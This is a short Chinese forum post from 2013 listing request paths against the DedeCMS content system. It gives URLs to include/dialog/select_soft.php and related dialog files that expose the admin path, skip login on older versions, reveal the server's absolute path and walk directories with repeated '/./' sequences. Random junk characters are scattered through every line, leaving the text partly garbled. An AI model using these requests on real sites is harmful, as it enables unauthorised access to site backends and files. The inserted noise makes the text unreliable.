1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理, H0 y d/ w. A# u/ R
2 N0 z) ^: _( `0 R: J2 ~
员帐号,新版本的就直接转向了后台.
- Q4 \1 m/ R4 ]5 z& m. Z- F! G, p! }
3 i+ y* h( V2 n+ G2.include/dialog/config.php会爆出后台管理路径# Q2 U, w$ w/ j5 A
) W5 `2 p, w) j# |5 _3 Y3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录* A& e8 d4 g- o! L3 H+ |6 b: C
1 ]* q* V4 D% l; E3 X8 P
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
! J1 p5 I' u5 t2 k( N* N" T* Y! q0 Z% Y5 W1 ]
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉1 J4 U- W' q' Z% W$ ?
/ w# Q3 `$ s. J$ U# _0 a% c
到根目录去.不过这些版本的访问地址有些不同.: |) C5 Q0 R) H0 q( O0 r
地址为require/dialog/select_soft.php?activepath=/././././././././
# W3 f9 s7 X6 w4 V0 e5 E6 x, l- v- J( W0 S( \" z
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..' K5 _; Z/ j& v! ~
存在相同问题的文件还有) v7 q' C! E1 l" h" E+ c0 d3 k, M5 p
include\dialog\select_images.php
8 f- ^- ?6 Y8 Q$ Linclude\dialog\select_media.php
% v* V/ a+ Y3 k( ^5 Cinclude\dialog\select_templets.php" o, N' [/ E) r6 R7 h
|
发表于 2013-4-16 16:50:43
收藏
支持
反对